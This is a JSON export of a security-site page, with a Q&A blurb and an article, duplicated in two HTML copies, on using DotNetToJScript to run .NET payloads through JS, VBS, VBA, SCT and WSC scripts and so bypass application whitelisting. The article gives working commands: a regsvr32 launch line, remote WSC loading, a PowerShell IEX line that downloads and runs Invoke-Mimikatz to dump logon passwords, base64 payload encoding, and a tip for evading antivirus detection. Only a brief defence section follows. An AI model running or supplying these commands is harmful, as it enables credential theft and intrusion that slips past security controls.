[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fpOIlHoDQERgJRZmKIwSIknOFH7rrYtSXr29GtrCELUs":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":52,"createdAt":52,"_status":51},41,"What is DotNetToJScript and how can it be used to load .NET programs?","DotNetToJScript is a tool by James Forshaw that converts .NET assemblies into JScript, VBScript, or VBA scripts, enabling in-memory execution without dropping files. As detailed in [Loading .Net Programs Using JS](\u002Fnews\u002Floading-net-programs-using-js), you compile it with VS2012 (adding NDesk.Options and System.Core references) then generate scripts like `DotNetToJScript.exe -o 1.js ExampleAssembly.dll`. This technique bypasses application whitelisting and is similar to other code execution methods such as [Analysis of Executing Programs Using rundll32](\u002Fnews\u002Fanalysis-of-executing-programs-using-rundll32) or [Use Excel.Application object's RegisterXLL() method to load dll](\u002Fnews\u002Fuse-excel-application-objects-registerxll-method-to-load-dll).","\u003Cp>DotNetToJScript is a tool by James Forshaw that converts .NET assemblies into JScript, VBScript, or VBA scripts, enabling in-memory execution without dropping files. As detailed in [Loading .Net Programs Using JS](\u002Fnews\u002Floading-net-programs-using-js), you compile it with VS2012 (adding NDesk.Options and System.Core references) then generate scripts like `DotNetToJScript.exe -o 1.js ExampleAssembly.dll`. This technique bypasses application whitelisting and is similar to other code execution methods such as [Analysis of Executing Programs Using rundll32](\u002Fnews\u002Fanalysis-of-executing-programs-using-rundll32) or [Use Excel.Application object&#39;s RegisterXLL() method to load dll](\u002Fnews\u002Fuse-excel-application-objects-registerxll-method-to-load-dll).\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Floading-net-programs-using-js\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","what-is-dotnettojscript-and-how-can-it-be-used-to-load-net-programs-1777485346036","DotNetToJScript, JScript, VBScript, .NET assembly, in-memory execution, bypass whitelisting",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":48,"updatedAt":49,"createdAt":50,"_status":51},12,"Loading .Net Programs Using JS","loading-net-programs-using-js","Learn to load .Net programs via JS\u002FVBS scripts using DotNetToJScript. Includes compilation, usage, and payloads like shellcode, Mimikatz, and PowerShell execution.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Recently, James Forshaw open-sourced a tool called DotNetToJScript, which can load .Net programs using JS\u002FVbs scripts, which is quite interesting.\u003C\u002Fp>\u003Cp>Both Casey Smith and Cn33liz have conducted further research on this and open-sourced their exploitation code.\u003C\u002Fp>\u003Cp>This article will systematically organize this technology to help everyone better understand it.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>DotNetToJScript Compilation Method\u003C\u002Fli>\u003Cli>DotNetToJScript Usage Method\u003C\u002Fli>\u003Cli>Executing Shellcode Using JS\u002FVbs\u003C\u002Fli>\u003Cli>Executing PowerShell Scripts Using JS\u002FVbs\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 DotNetToJScript Compilation Method\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>\u003Cstrong>DotNetToJScript download address:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Ftyranid\u002FDotNetToJScript\u003C\u002Fp>\u003Cp>Compile using the tool VS2012\u003C\u002Fp>\u003Ch3>Error 1:\u003C\u002Fh3>\u003Cp>Missing assembly reference NDesk.Options\u003C\u002Fp>\u003Cp>\u003Cstrong>Solution:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Need to add reference NDesk.Options\u003C\u002Fp>\u003Cp>\u003Cstrong>Download address:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>http:\u002F\u002Fwww.ndesk.org\u002FOptions\u003C\u002Fp>\u003Cp>Unzip, Project - Add Reference - Browse - \\ndesk-options-0.2.1.bin\\ndesk-options-0.2.1.bin\\lib\\ndesk-options\\NDesk.Options.dll\u003C\u002Fp>\u003Cp>Next, specify the target framework as .NET Framework 2.0, recompile\u003C\u002Fp>\u003Ch3>Error 2:\u003C\u002Fh3>\u003Cp>Missing assembly reference Linq\u003C\u002Fp>\u003Cp>\u003Cstrong>Solution:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Add reference to System.Core.dll 3.5\u003C\u002Fp>\u003Cp>Location:\u003C\u002Fp>\u003Cp>C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Core.dll\u003C\u002Fp>\u003Cp>After adding the reference, compilation succeeded, generating DotNetToJScript.exe and ExampleAssembly.dll in two directories respectively\u003C\u002Fp>\u003Ch2>0x03 DotNetToJScript Usage\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Generate js script\u003C\u002Fh3>\u003Cp>Parameters are as follows:\u003C\u002Fp>\u003Cp>DotNetToJScript.exe -o 1.js ExampleAssembly.dll\u003C\u002Fp>\u003Cp>After execution, 1.js is generated\u003C\u002Fp>\u003Cp>Execute 1.js to call public TestClass() in ExampleAssembly.dll\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019779827_0_bec909168f.jpeg\">\u003C\u002Fp>\u003Cp>The execution process is as shown below, a dialog box pops up\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019789851_1_7938ed062e.jpeg\">\u003C\u002Fp>\u003Ch3>2. Generate vbs script\u003C\u002Fh3>\u003Cp>Parameters are as follows:\u003C\u002Fp>\u003Cp>DotNetToJScript.exe -l vbscript -o 2.vbs ExampleAssembly.dll\u003C\u002Fp>\u003Cp>Execution is as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019799588_2_772e8a2996.jpeg\">\u003C\u002Fp>\u003Ch3>3. Generate VBA script\u003C\u002Fh3>\u003Cp>Parameters are as follows:\u003C\u002Fp>\u003Cp>DotNetToJScript.exe -l vba -o 2.txt ExampleAssembly.dll\u003C\u002Fp>\u003Cp>To be placed in Office macros\u003C\u002Fp>\u003Ch3>4. Generate SCT script\u003C\u002Fh3>\u003Cp>Parameters are as follows:\u003C\u002Fp>\u003Cp>DotNetToJScript.exe -u -o 3.sct ExampleAssembly.dll\u003C\u002Fp>\u003Cp>Startup method:\u003C\u002Fp>\u003Cp>Command line parameters are as follows:\u003C\u002Fp>\u003Cp>regsvr32.exe \u002Fu \u002Fn \u002Fs \u002Fi:3.sct scrobj.dll\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>For details, refer to the previous article 'Use SCT to Bypass Application Whitelisting Protection'\u003C\u002Fp>\u003Ch3>5. Generate wsc script\u003C\u002Fh3>\u003Cp>Parameters are as follows:\u003C\u002Fp>\u003Cp>DotNetToJScript.exe -m -o 4.wsc ExampleAssembly.dll\u003C\u002Fp>\u003Cp>\u003Cstrong>Startup method 1: Local invocation\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Call via js, the js script content is as follows:\u003C\u002Fp>\u003Cp>GetObject(\"script:C:\\\\test\\\\4.wsc\");\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Absolute path required, wsc file extension can be arbitrary\u003C\u002Fp>\u003Cp>\u003Cstrong>Startup method 2: Remote startup\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Save 4.wsc on GitHub, address as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fraw.githubusercontent.某开源项目.wsc\u003C\u002Fp>\u003Cp>js script content is as follows:\u003C\u002Fp>\u003Cp>GetObject(\"script:https:\u002F\u002Fraw.githubusercontent.某开源项目.wsc\")\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>For details, please refer to the previous article 'WSC, JSRAT and WMI Backdoor'\u003C\u002Fp>\u003Ch2>0x04 Summary of payloads achievable using JS\u002FVbs\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>For the ExampleAssembly.dll in the above tests, it can be replaced with other payloads:\u003C\u002Fp>\u003Ch3>1. Execute shellcode\u003C\u002Fh3>\u003Cp>Code can be referenced at the following address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgist.github.com\u002FsubTee\u002F618d40aa4229581925eb9025429d8420#gistcomment-2057305\u003C\u002Fp>\u003Cp>Create a new C# project, you can choose a C# console application, compile it into an exe\u003C\u002Fp>\u003Cp>The parameters for generating the js script are as follows:\u003C\u002Fp>\u003Cp>DotNetToJScript.exe -o shellcode.js shellcode.exe\u003C\u002Fp>\u003Cp>Test as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019813083_3_6f5a16e5fd.jpeg\">\u003C\u002Fp>\u003Ch3>2. Execute mimikatz\u003C\u002Fh3>\u003Cp>Code can be referenced at the following address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgist.github.com\u002FsubTee\u002Fb30e0bcc7645c790fcd993cfd0ad622f\u003C\u002Fp>\u003Cp>For executing Mimikatz code in C#, refer to the following address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgist.github.com\u002FsubTee\u002F5c636b8736530fb20c3d\u003C\u002Fp>\u003Ch3>3. Execute PowerShell\u003C\u002Fh3>\u003Cp>Code can be referenced at the following address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FCn33liz\u002FStarFighters\u003C\u002Fp>\u003Cp>Author: Cn33liz\u003C\u002Fp>\u003Cp>\u003Cstrong>StarFighters:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cul>\u003Cli>Capable of loading Empire framework startup code\u003C\u002Fli>\u003Cli>Supports JavaScript and VBScript\u003C\u002Fli>\u003Cli>Does not require powershell.exe, can be used to bypass whitelist blocking\u003C\u002Fli>\u003Cli>Executes PowerShell code via PowerShell runspace environment (.NET)\u003C\u002Fli>\u003C\u002Ful>\u003Cp>For methods of executing PowerShell code, refer to the project p0wnedShell, address as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FCn33liz\u002Fp0wnedShell\u003C\u002Fp>\u003Cp>I previously researched this, streamlined its code to support .NET 2.0, address as follows:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>\u003Cstrong>Actual testing:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>StarFighters can not only load the startup code of the Empire framework, but also be used to directly execute PowerShell commands\u003C\u002Fp>\u003Cp>\u003Cstrong>Method as follows:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>\u003Cstrong>(1) Execute a single PowerShell command\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The command needs to be base64 encoded, as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$code = 'start calc.exe'\u003Cbr>$bytes  = [System.Text.Encoding]::UNICODE.GetBytes($code);\u003Cbr>$encoded = [System.Convert]::ToBase64String($bytes)\u003Cbr>$encoded \u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The resulting base64 code is:\u003C\u002Fp>\u003Cp>cwB0AGEAcgB0ACAAYwBhAGwAYwAuAGUAeABlAA==\u003C\u002Fp>\u003Cp>Replace var EncodedPayload in StarFighter.js\u003C\u002Fp>\u003Cp>Successfully executed, calculator pops up as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019825348_4_26ebd85135.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>(2) Execute PowerShell script locally\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Using Invoke-Mimikatz.ps1, download link as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fraw.githubusercontent.com\u002FPowerShellMafia\u002FPowerSploit\u002Fmaster\u002FExfiltration\u002FInvoke-Mimikatz.ps1\u003C\u002Fp>\u003Cp>Add the operation code for exporting credentials:\u003C\u002Fp>\u003Cp>Invoke-Mimikatz -Command \"log privilege::debug sekurlsa::logonpasswords\"\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Adding the log parameter is to export the results to the file mimikatz.log\u003C\u002Fp>\u003Cp>Command as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$code = Get-Content -Path Invoke-Mimikatz.ps1\u003Cbr>$bytes  = [System.Text.Encoding]::UNICODE.GetBytes($code);\u003Cbr>$encoded = [System.Convert]::ToBase64String($bytes)\u003Cbr>$encoded | Out-File 1.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Replace var EncodedPayload in StarFighter.js with the content from the generated 1.txt\u003C\u002Fp>\u003Cp>\u003Cstrong>(3) Remote execution of PowerShell script\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>PowerShell command as follows:\u003C\u002Fp>\u003Cp>powershell IEX \"(New-Object Net.WebClient).DownloadString('https:\u002F\u002Fraw.githubusercontent.com\u002FPowerShellMafia\u002FPowerSploit\u002Fmaster\u002FExfiltration\u002FInvoke-Mimikatz.ps1'); Invoke-Mimikatz -Command 'log privilege::debug sekurlsa::logonpasswords'\"\u003C\u002Fp>\u003Cp>The code for base64 encoding is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$code = Get-Content -Path code.txt\u003Cbr>$bytes  = [System.Text.Encoding]::UNICODE.GetBytes($code);\u003Cbr>$encoded = [System.Convert]::ToBase64String($bytes)\u003Cbr>$encoded | Out-File 2.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Replace var EncodedPayload in StarFighter.js with the content generated in 2.txt\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>A certain antivirus software will detect and kill this js script by default. A method to bypass static detection (no guarantee of validity):\u003C\u002Fp>\u003Cul>\u003Cli>Save the script in ASCII format, it will be detected and killed\u003C\u002Fli>\u003Cli>Switch to UNICODE format, it will not be detected and killed\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x05 Defense\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>From a defensive perspective, everyone will block powerShell.exe, but this is far from enough:\u003C\u002Fp>\u003Cp>\u003Cstrong>powershell runspace environment (.NET) is the key\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Specifically for the techniques in this article, the defense methods are as follows:\u003C\u002Fp>\u003Cp>Restrict js, vbs, vba macros, sct, and wsc scripts separately\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Recently, James Forshaw open-sourced a tool called DotNetToJScript, which can load .Net programs using JS\u002FVbs scripts, which is quite interesting.\u003C\u002Fp>\u003Cp>Both Casey Smith and Cn33liz have conducted further research on this and open-sourced their exploitation code.\u003C\u002Fp>\u003Cp>This article will systematically organize this technology to help everyone better understand it.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>DotNetToJScript Compilation Method\u003C\u002Fli>\u003Cli>DotNetToJScript Usage Method\u003C\u002Fli>\u003Cli>Executing Shellcode Using JS\u002FVbs\u003C\u002Fli>\u003Cli>Executing PowerShell Scripts Using JS\u002FVbs\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 DotNetToJScript Compilation Method\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>\u003Cstrong>DotNetToJScript download address:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Ftyranid\u002FDotNetToJScript\u003C\u002Fp>\u003Cp>Compile using the tool VS2012\u003C\u002Fp>\u003Ch3>Error 1:\u003C\u002Fh3>\u003Cp>Missing assembly reference NDesk.Options\u003C\u002Fp>\u003Cp>\u003Cstrong>Solution:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Need to add reference NDesk.Options\u003C\u002Fp>\u003Cp>\u003Cstrong>Download address:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>http:\u002F\u002Fwww.ndesk.org\u002FOptions\u003C\u002Fp>\u003Cp>Unzip, Project - Add Reference - Browse - \\ndesk-options-0.2.1.bin\\ndesk-options-0.2.1.bin\\lib\\ndesk-options\\NDesk.Options.dll\u003C\u002Fp>\u003Cp>Next, specify the target framework as .NET Framework 2.0, recompile\u003C\u002Fp>\u003Ch3>Error 2:\u003C\u002Fh3>\u003Cp>Missing assembly reference Linq\u003C\u002Fp>\u003Cp>\u003Cstrong>Solution:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Add reference to System.Core.dll 3.5\u003C\u002Fp>\u003Cp>Location:\u003C\u002Fp>\u003Cp>C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Core.dll\u003C\u002Fp>\u003Cp>After adding the reference, compilation succeeded, generating DotNetToJScript.exe and ExampleAssembly.dll in two directories respectively\u003C\u002Fp>\u003Ch2>0x03 DotNetToJScript Usage\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Generate js script\u003C\u002Fh3>\u003Cp>Parameters are as follows:\u003C\u002Fp>\u003Cp>DotNetToJScript.exe -o 1.js ExampleAssembly.dll\u003C\u002Fp>\u003Cp>After execution, 1.js is generated\u003C\u002Fp>\u003Cp>Execute 1.js to call public TestClass() in ExampleAssembly.dll\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019779827_0_bec909168f-1.jpeg\">\u003C\u002Fp>\u003Cp>The execution process is as shown below, a dialog box pops up\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019789851_1_7938ed062e-1.jpeg\">\u003C\u002Fp>\u003Ch3>2. Generate vbs script\u003C\u002Fh3>\u003Cp>Parameters are as follows:\u003C\u002Fp>\u003Cp>DotNetToJScript.exe -l vbscript -o 2.vbs ExampleAssembly.dll\u003C\u002Fp>\u003Cp>Execution is as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019799588_2_772e8a2996-1.jpeg\">\u003C\u002Fp>\u003Ch3>3. Generate VBA script\u003C\u002Fh3>\u003Cp>Parameters are as follows:\u003C\u002Fp>\u003Cp>DotNetToJScript.exe -l vba -o 2.txt ExampleAssembly.dll\u003C\u002Fp>\u003Cp>To be placed in Office macros\u003C\u002Fp>\u003Ch3>4. Generate SCT script\u003C\u002Fh3>\u003Cp>Parameters are as follows:\u003C\u002Fp>\u003Cp>DotNetToJScript.exe -u -o 3.sct ExampleAssembly.dll\u003C\u002Fp>\u003Cp>Startup method:\u003C\u002Fp>\u003Cp>Command line parameters are as follows:\u003C\u002Fp>\u003Cp>regsvr32.exe \u002Fu \u002Fn \u002Fs \u002Fi:3.sct scrobj.dll\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>For details, refer to the previous article 'Use SCT to Bypass Application Whitelisting Protection'\u003C\u002Fp>\u003Ch3>5. Generate wsc script\u003C\u002Fh3>\u003Cp>Parameters are as follows:\u003C\u002Fp>\u003Cp>DotNetToJScript.exe -m -o 4.wsc ExampleAssembly.dll\u003C\u002Fp>\u003Cp>\u003Cstrong>Startup method 1: Local invocation\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Call via js, the js script content is as follows:\u003C\u002Fp>\u003Cp>GetObject(\"script:C:\\\\test\\\\4.wsc\");\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Absolute path required, wsc file extension can be arbitrary\u003C\u002Fp>\u003Cp>\u003Cstrong>Startup method 2: Remote startup\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Save 4.wsc on GitHub, address as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fraw.githubusercontent.某开源项目.wsc\u003C\u002Fp>\u003Cp>js script content is as follows:\u003C\u002Fp>\u003Cp>GetObject(\"script:https:\u002F\u002Fraw.githubusercontent.某开源项目.wsc\")\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>For details, please refer to the previous article 'WSC, JSRAT and WMI Backdoor'\u003C\u002Fp>\u003Ch2>0x04 Summary of payloads achievable using JS\u002FVbs\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>For the ExampleAssembly.dll in the above tests, it can be replaced with other payloads:\u003C\u002Fp>\u003Ch3>1. Execute shellcode\u003C\u002Fh3>\u003Cp>Code can be referenced at the following address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgist.github.com\u002FsubTee\u002F618d40aa4229581925eb9025429d8420#gistcomment-2057305\u003C\u002Fp>\u003Cp>Create a new C# project, you can choose a C# console application, compile it into an exe\u003C\u002Fp>\u003Cp>The parameters for generating the js script are as follows:\u003C\u002Fp>\u003Cp>DotNetToJScript.exe -o shellcode.js shellcode.exe\u003C\u002Fp>\u003Cp>Test as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019813083_3_6f5a16e5fd-1.jpeg\">\u003C\u002Fp>\u003Ch3>2. Execute mimikatz\u003C\u002Fh3>\u003Cp>Code can be referenced at the following address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgist.github.com\u002FsubTee\u002Fb30e0bcc7645c790fcd993cfd0ad622f\u003C\u002Fp>\u003Cp>For executing Mimikatz code in C#, refer to the following address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgist.github.com\u002FsubTee\u002F5c636b8736530fb20c3d\u003C\u002Fp>\u003Ch3>3. Execute PowerShell\u003C\u002Fh3>\u003Cp>Code can be referenced at the following address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FCn33liz\u002FStarFighters\u003C\u002Fp>\u003Cp>Author: Cn33liz\u003C\u002Fp>\u003Cp>\u003Cstrong>StarFighters:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cul>\u003Cli>Capable of loading Empire framework startup code\u003C\u002Fli>\u003Cli>Supports JavaScript and VBScript\u003C\u002Fli>\u003Cli>Does not require powershell.exe, can be used to bypass whitelist blocking\u003C\u002Fli>\u003Cli>Executes PowerShell code via PowerShell runspace environment (.NET)\u003C\u002Fli>\u003C\u002Ful>\u003Cp>For methods of executing PowerShell code, refer to the project p0wnedShell, address as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FCn33liz\u002Fp0wnedShell\u003C\u002Fp>\u003Cp>I previously researched this, streamlined its code to support .NET 2.0, address as follows:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>\u003Cstrong>Actual testing:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>StarFighters can not only load the startup code of the Empire framework, but also be used to directly execute PowerShell commands\u003C\u002Fp>\u003Cp>\u003Cstrong>Method as follows:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>\u003Cstrong>(1) Execute a single PowerShell command\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The command needs to be base64 encoded, as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$code = 'start calc.exe'\u003Cbr>$bytes  = [System.Text.Encoding]::UNICODE.GetBytes($code);\u003Cbr>$encoded = [System.Convert]::ToBase64String($bytes)\u003Cbr>$encoded \u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The resulting base64 code is:\u003C\u002Fp>\u003Cp>cwB0AGEAcgB0ACAAYwBhAGwAYwAuAGUAeABlAA==\u003C\u002Fp>\u003Cp>Replace var EncodedPayload in StarFighter.js\u003C\u002Fp>\u003Cp>Successfully executed, calculator pops up as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019825348_4_26ebd85135-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>(2) Execute PowerShell script locally\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Using Invoke-Mimikatz.ps1, download link as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fraw.githubusercontent.com\u002FPowerShellMafia\u002FPowerSploit\u002Fmaster\u002FExfiltration\u002FInvoke-Mimikatz.ps1\u003C\u002Fp>\u003Cp>Add the operation code for exporting credentials:\u003C\u002Fp>\u003Cp>Invoke-Mimikatz -Command \"log privilege::debug sekurlsa::logonpasswords\"\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Adding the log parameter is to export the results to the file mimikatz.log\u003C\u002Fp>\u003Cp>Command as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$code = Get-Content -Path Invoke-Mimikatz.ps1\u003Cbr>$bytes  = [System.Text.Encoding]::UNICODE.GetBytes($code);\u003Cbr>$encoded = [System.Convert]::ToBase64String($bytes)\u003Cbr>$encoded | Out-File 1.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Replace var EncodedPayload in StarFighter.js with the content from the generated 1.txt\u003C\u002Fp>\u003Cp>\u003Cstrong>(3) Remote execution of PowerShell script\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>PowerShell command as follows:\u003C\u002Fp>\u003Cp>powershell IEX \"(New-Object Net.WebClient).DownloadString('https:\u002F\u002Fraw.githubusercontent.com\u002FPowerShellMafia\u002FPowerSploit\u002Fmaster\u002FExfiltration\u002FInvoke-Mimikatz.ps1'); Invoke-Mimikatz -Command 'log privilege::debug sekurlsa::logonpasswords'\"\u003C\u002Fp>\u003Cp>The code for base64 encoding is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$code = Get-Content -Path code.txt\u003Cbr>$bytes  = [System.Text.Encoding]::UNICODE.GetBytes($code);\u003Cbr>$encoded = [System.Convert]::ToBase64String($bytes)\u003Cbr>$encoded | Out-File 2.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Replace var EncodedPayload in StarFighter.js with the content generated in 2.txt\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>A certain antivirus software will detect and kill this js script by default. A method to bypass static detection (no guarantee of validity):\u003C\u002Fp>\u003Cul>\u003Cli>Save the script in ASCII format, it will be detected and killed\u003C\u002Fli>\u003Cli>Switch to UNICODE format, it will not be detected and killed\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x05 Defense\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>From a defensive perspective, everyone will block powerShell.exe, but this is far from enough:\u003C\u002Fp>\u003Cp>\u003Cstrong>powershell runspace environment (.NET) is the key\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Specifically for the techniques in this article, the defense methods are as follows:\u003C\u002Fp>\u003Cp>Restrict js, vbs, vba macros, sct, and wsc scripts separately\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",1767,"Onedaysec",4,"published","2026-02-02T08:20:05.028Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"Load .Net Programs with JS\u002FVBS: DotNetToJScript Guide & Payloads","DotNetToJScript, .Net, JS, VBS, shellcode, PowerShell, Mimikatz, payload, bypass, exploitation",null,false,[],{"docs":43,"hasNextPage":40},[44,45,46,47,4],45,44,43,42,{"title":39,"description":39,"image":39},"2026-07-24T15:37:15.833Z","2026-07-23T16:00:55.058Z","draft","2026-07-23T16:03:07.458Z"]